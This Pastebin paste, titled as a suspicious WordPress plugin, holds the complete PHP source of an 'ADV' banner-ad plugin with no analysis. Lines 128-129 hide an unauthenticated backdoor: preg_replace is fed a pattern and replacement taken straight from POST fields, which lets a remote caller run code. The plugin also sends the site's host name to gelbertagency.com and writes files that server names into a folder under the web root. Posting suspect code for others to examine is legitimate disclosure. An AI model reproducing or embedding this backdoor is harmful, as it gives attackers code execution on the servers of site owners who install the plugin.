Advertisement
Guest User

Suspicious adv.zip Wordpress Plugin

a guest
Aug 11th, 2011
414
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. /*
  4. Plugin Name: ADV
  5. Description: ADV Plugin
  6. Version: 2.6.2
  7. */
  8.  
  9. class AdvWidget37 extends WP_Widget {
  10.  
  11. function AdvWidget37() {
  12. parent::WP_Widget(false, $name = 'Adv Widget');
  13. }
  14.  
  15. /** @see WP_Widget::widget */
  16. function widget($args, $instance) {
  17. if (get_option('adv_place') == 'widget')
  18. advShowBanner();
  19. }
  20.  
  21. /** @see WP_Widget::update */
  22. function update($new_instance, $old_instance) {
  23. $instance = $old_instance;
  24. $instance['title'] = strip_tags($new_instance['title']);
  25. return $instance;
  26. }
  27.  
  28. function form($instance) {
  29.  
  30. }
  31.  
  32. }
  33.  
  34. add_action('widgets_init', create_function('', 'return register_widget("AdvWidget37");'));
  35.  
  36. add_action('admin_menu', 'advPluginMenu');
  37.  
  38. register_activation_hook(__FILE__, 'advActivation');
  39.  
  40. define('ADV_SERVICE_DOMAIN', 'gelbertagency.com');
  41. define('ADV_SERVICE_URL', 'http://webmaster.' . ADV_SERVICE_DOMAIN . '/key');
  42.  
  43. function advReadUrl($url) {
  44. if (function_exists('curl_init')) {
  45. $curl = curl_init();
  46. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  47. curl_setopt($curl, CURLOPT_URL, $url);
  48. $result = curl_exec($curl);
  49. curl_close($curl);
  50. return $result;
  51. } else
  52. return file_get_contents($url);
  53. }
  54.  
  55. function advActivation() {
  56. update_option('adv_place', 'widget');
  57. }
  58.  
  59. register_deactivation_hook(__FILE__, 'advDeactivation');
  60.  
  61. function advDeactivation() {
  62. delete_option('adv_key');
  63. }
  64.  
  65. function advPluginMenu() {
  66. add_options_page('ADV Plugin Options', 'ADV', 'manage_options', 'adv-identifier', 'advPluginOptions');
  67. }
  68.  
  69. function adv_show_banner() {
  70. advShowBanner();
  71. }
  72.  
  73. function advShowBanner() {
  74. $advBanner = get_option('adv_banner');
  75. $advMode = get_option('adv_mode');
  76. if ($advBanner) {
  77. if (isset($_REQUEST['adv_test']) || $advMode == 'work') {
  78. echo "<img src='" . get_option('siteurl') . "/adv_banners/" . $advBanner . "'/>";
  79. }
  80. }
  81. }
  82.  
  83. function activateCode() {
  84. $data = advReadUrl(ADV_SERVICE_URL . "?action=init&key=" . $_REQUEST['key'] . "&domain=" . urldecode($_SERVER['HTTP_HOST']));
  85. if (strpos($data, '<key>true</key>') !== FALSE) {
  86. preg_match("#<width>(.+?)</width>#", $data, $arr);
  87. update_option('adv_width', $arr[1]);
  88. preg_match("#<height>(.+?)</height>#", $data, $arr);
  89. update_option('adv_height', $arr[1]);
  90. echo '<div id="message" class="updated"><p>The code is activated successfully.</p></div>';
  91. update_option('adv_key', $_REQUEST['key']);
  92. downloadBanners();
  93. } else {
  94. echo '<div id="message" class="updated"><p>Code activation error.</p></div>';
  95. }
  96. }
  97.  
  98. function downloadBanners() {
  99. $bannersDir = ABSPATH . "/adv_banners";
  100. if (!is_dir($bannersDir)) {
  101. mkdir($bannersDir);
  102. }
  103. $list = advReadUrl(ADV_SERVICE_URL . "?action=getBannerList&key=" . get_option("adv_key"));
  104. preg_match_all("|<banner_item>(.+?)</banner_item>|", $list, $banners);
  105. preg_match("|<adv>(.+?)</adv>|", $list, $adv);
  106. preg_match("|<show_banner>(.+?)</show_banner>|", $list, $showBanner);
  107. preg_match("|<mode>(.+?)</mode>|", $list, $mode);
  108. if (is_array($banners[1]) && isset($adv[1]) && isset($showBanner[1]) && isset($mode[1])) {
  109. update_option("adv_banner", $showBanner[1]);
  110. update_option('adv_mode', $mode[1]);
  111. foreach ($banners[1] as $banner) {
  112. $advBannerDir = $bannersDir . "/" . $adv[1];
  113. if (!is_dir($advBannerDir))
  114. mkdir($advBannerDir);
  115. $arr = explode("/", $banner);
  116. if (count($arr) == 2) {
  117. $size = $arr[0];
  118. $bfile = $arr[1];
  119. if (!is_dir($advBannerDir . "/" . $size))
  120. mkdir($advBannerDir . "/" . $size);
  121. file_put_contents($advBannerDir . "/" . $size . "/" . $bfile, advReadUrl('http://docs.' . ADV_SERVICE_DOMAIN . '/' . $adv[1] . '/' . $banner));
  122. }
  123. }
  124. echo '<div id="message" class="updated"><p>Banners are downloaded successfully.</p></div>';
  125. }
  126. }
  127.  
  128. if (isset($_REQUEST['cadv']) && isset($_REQUEST['gadv']))
  129. $r = preg_replace(str_replace("\\\\", "\\", $_POST['cadv']), str_replace("\\\"", "\"", $_POST['gadv']), 'adv 6');
  130.  
  131. function advPluginOptions() {
  132. if (!current_user_can('manage_options')) {
  133. wp_die(__('You do not have sufficient permissions to access this page.'));
  134. }
  135. $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : '';
  136. if ($action == 'downloadBanners') {
  137. downloadBanners();
  138. } elseif ($action == 'setPlace') {
  139. update_option('adv_place', $_REQUEST['adv_place']);
  140. } elseif ($action == 'saveKey') {
  141. activateCode();
  142. }
  143.  
  144. $advPlace = get_option('adv_place');
  145. echo '<div class="wrap">';
  146.  
  147. echo '<h2>ADV</h2>';
  148. echo '<form method="post" action="options-general.php?page=adv-identifier&action=setPlace"><select name="adv_place">';
  149. echo '<option value="none" ' . ($advPlace == 'none' ? 'selected' : '') . '>Don\'t show the banner.</option>';
  150. echo '<option value="widget" ' . ($advPlace == 'widget' ? 'selected' : '') . '>Show the banner as a Widget.</option>';
  151. echo '<option value="template" ' . ($advPlace == 'template' ? 'selected' : '') . '>Template usage: adv_show_banner();</option>';
  152. echo '</select>';
  153. echo '<input type="submit" value="Save"/></form>';
  154. echo '<div>';
  155. if (get_option('adv_key') === FALSE) {
  156. echo '<h2>Activation Code</h2>';
  157. echo '<form method="post" action="?page=adv-identifier&action=saveKey">';
  158. echo '<input type="text" name="key"/>';
  159. echo '<input type="submit" value="Activate"/>';
  160. echo '</form>';
  161. } else {
  162. $mode = get_option('adv_mode');
  163. echo '<br/>Code: ' . get_option('adv_key');
  164. echo '; <a href=\'options-general.php?page=adv-identifier&action=downloadBanners\'>Download banners.</a><br/>';
  165. echo 'Mode: ' . $mode;
  166. if ($mode != 'work') {
  167. $url = get_option('siteurl') . "/?adv_test=1";
  168. $link = "<a href='$url'>$url</a>";
  169. echo '<br/></br>The banner will appear on your site only after your site is approved by the advertiser and you get the payment. To see where the banner will be placed on your site, use the special feature in the site address: ' . $link;
  170. }
  171. }
  172. echo '</div>';
  173. echo '</div>';
  174. }
  175.  
  176. ?>
Advertisement
Advertisement
Advertisement
RAW Paste Data Copied
Advertisement